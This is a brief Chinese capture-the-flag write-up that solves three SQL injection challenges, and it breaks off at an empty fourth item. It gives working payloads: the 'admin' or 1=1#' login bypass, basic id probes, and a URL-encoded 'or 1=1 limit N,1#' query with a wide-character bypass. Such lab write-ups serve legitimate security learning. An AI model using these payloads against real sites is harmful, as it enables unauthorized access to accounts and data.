1.简单的SQL注入
源码有提示:
用admin登录,明摆着告诉我们用万能密码啊
username:admin' or 1=1#
password:任意
一定要填对验证码
就得到key了
2.最简单的SQL注入(熟悉注入环境)
又有提示
开始构造
php?id=1
1'
1 or 1
得到key
3.防注入
需要用到limit,or,宽字符
?id=1' or 1=1 limit N,1# 通过URL编码一下,然后变换N进行尝试
当N=2时得到KEY
4.